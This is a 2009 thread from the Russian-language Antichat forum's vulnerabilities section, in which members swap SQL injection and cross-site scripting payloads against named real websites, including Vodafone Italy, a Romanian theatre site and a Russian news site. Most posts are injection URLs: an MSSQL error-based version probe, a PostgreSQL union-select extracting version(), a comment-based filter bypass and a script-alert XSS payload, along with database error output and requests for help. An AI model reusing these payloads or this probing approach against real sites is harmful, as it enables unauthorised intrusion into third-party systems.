ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #5791  
Старый 05.03.2009, 23:06
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

or 1=(select @@version)
 
Ответить с цитированием

  #5792  
Старый 06.03.2009, 00:23
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

F4R, читай литературу по MSSQL!
 
Ответить с цитированием

  #5793  
Старый 06.03.2009, 07:45
F4R
Banned
Регистрация: 20.06.2008
Сообщений: 296
Провел на форуме:
1385078

Репутация: 126
Отправить сообщение для F4R с помощью ICQ
По умолчанию

дак я читал вчера весь день...

на
Цитата:
/details.asp?id=699882982&dme_code=or 1=(select @@version)
выводит

Цитата:
Microsoft OLE DB Provider for SQL Server error '80040e21'

Incorrect syntax near the keyword 'or'.

/inc/connection.asp, line 48
 
Ответить с цитированием

  #5794  
Старый 06.03.2009, 09:52
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.areaaziende.vodafone.it/190/pace/LoadAction.do?dest=demo&doc=iphone_3g_black&br=xss &mod=li%20zdes'%20ili%20prosto?

что здесь такое?
 
Ответить с цитированием

  #5795  
Старый 06.03.2009, 10:09
Zitt
Познавший АНТИЧАТ
Регистрация: 07.05.2006
Сообщений: 1,031
Провел на форуме:
5885100

Репутация: 773


Отправить сообщение для Zitt с помощью ICQ
По умолчанию

http://www.areaaziende.vodafone.it/190/pace/LoadAction.do?dest=demo&doc=iphone_3g_black&br=&mo d=prosto
 
Ответить с цитированием

  #5796  
Старый 06.03.2009, 10:10
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585

Репутация: 441
Отправить сообщение для DimOnOID с помощью ICQ
По умолчанию

Цитата:
Сообщение от Gorev  
http://www.areaaziende.vodafone.it/190/pace/LoadAction.do?dest=demo&doc=iphone_3g_black&br=xss &mod=li%20zdes'%20ili%20prosto?

что здесь такое?
Код:
http://www.areaaziende.vodafone.it/190/pace/LoadAction.do?dest=demo&doc=iphone_3g_black&br=xss&mod=<script>alert(/dd/)</script>
Не более...
 
Ответить с цитированием

  #5797  
Старый 06.03.2009, 10:54
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.tamasitheatre.ro/ro/1.html?cikk_id=3780+union+select+null,null,null,nu ll,null,null,null,null,null,null,null,null,null,nu ll,null,null,null--


version() PostgreSQL

не могу найти вывод, или все таки слепая?
 
Ответить с цитированием

  #5798  
Старый 06.03.2009, 11:30
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Цитата:
Сообщение от VITАL  
есть скуля... вроде. но что то не так
Фильтрация union, select
Работает
http://www.topnews.ru/citation.php?autor=749+order+by+8/*
Неработает
http://www.topnews.ru/citation.php?autor=749+order+by+8/*union*//*

Gorev
http://www.tamasitheatre.ro/ro/1.html?cikk_id=-3780+union+select+null,null,version(),null,4,null, null,null,1,null,null,null,null,null,null,2,3--
 
Ответить с цитированием

  #5799  
Старый 06.03.2009, 12:13
F4R
Banned
Регистрация: 20.06.2008
Сообщений: 296
Провел на форуме:
1385078

Репутация: 126
Отправить сообщение для F4R с помощью ICQ
По умолчанию

Цитата:
/details.asp?id=699882982&dme_code=or 1=(select @@version)

вылезает ошибка:

Цитата:
Microsoft OLE DB Provider for SQL Server error '80040e21'

Incorrect syntax near the keyword 'or'.

/inc/connection.asp, line 48


кто что может сказать?
 
Ответить с цитированием

  #5800  
Старый 06.03.2009, 12:28
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Цитата:
Сообщение от F4R  
кто что может сказать?
Я могу сказать вот что:

ОТСТАНЬ ОТ ЭТОГО САЙТА.

И лучше тебе прислушаться
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ